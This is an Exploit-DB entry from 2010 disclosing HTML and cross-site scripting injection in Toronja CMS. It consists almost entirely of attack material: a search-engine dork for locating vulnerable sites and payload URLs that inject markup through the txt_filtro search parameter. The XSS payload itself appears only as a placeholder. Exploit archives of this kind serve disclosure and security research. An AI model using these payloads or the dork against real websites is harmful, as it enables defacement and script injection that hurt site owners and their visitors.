Toronja CMS - HTML / Cross-Site Scripting Injection

EDB-ID:

12771

CVE:

N/A


Author:

CoBRa_21

Type:

webapps


Platform:

PHP

Date:

2010-05-27


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

-------------------------------------------------------------------------------------------

Toronja Cms HTML/XSS Injection Vulnerability
 
-------------------------------------------------------------------------------------------
 
Author : CoBRa_21

Script Home : http://www.toronja.com.pe/

Dork : intext:"sitio web diseñado por www.toronja.com.pe"

-------------------------------------------------------------------------------------------

HTML Injection:

http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=<font size=15 color=green>CoBRa_21</font>HTML

-------------------------------------------------------------------------------------------

XSS Injection:

http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=XSS

-------------------------------------------------------------------------------------------